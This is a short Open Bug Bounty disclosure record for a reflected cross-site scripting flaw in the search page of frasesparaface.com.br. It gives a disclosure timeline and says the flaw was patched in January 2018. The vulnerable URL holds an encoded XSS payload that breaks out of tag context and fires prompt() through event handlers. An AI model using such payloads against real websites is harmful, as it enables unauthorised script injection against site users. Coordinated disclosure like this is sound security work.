frasesparaface.com.br XSS vulnerability

2017-07-11T16:20:00
ID OBB:262963
Type openbugbounty
Reporter aaaimg
Modified 2018-01-06T03:51:00

Description

Vulnerable URL:
https://www.frasesparaface.com.br/busca.php?q=aaaaa%22+onfocus%3Dprompt(%2FOPENBUGBOUNTY%2F)+autofocus%3Dx+bad%3D%22%3Eaa%22%3E%3C%2Ftitle%3E%3C%2Fscript%3E%3Cmarquee+onstart%3Dprompt(%2FOPENBUGBOUNTY%2F)%3Edemonium%3C%2Ftag%3E
Details:

Description| Value
---|---
Patched:| Yes, at 05.01.2018
Latest check for patch:| 05.01.2018 15:34 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 52338
VIP website status:| Yes
Check frasesparaface.com.br SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 July, 2017 16:20 GMT
Generic security notifications sent to website owner| 11 July, 2017 16:23 GMT
Vulnerability details disclosed by researcher| 3 October, 2017 17:17 GMT
Vulnerability patched by the website owner| 6 January, 2018 03:51 GMT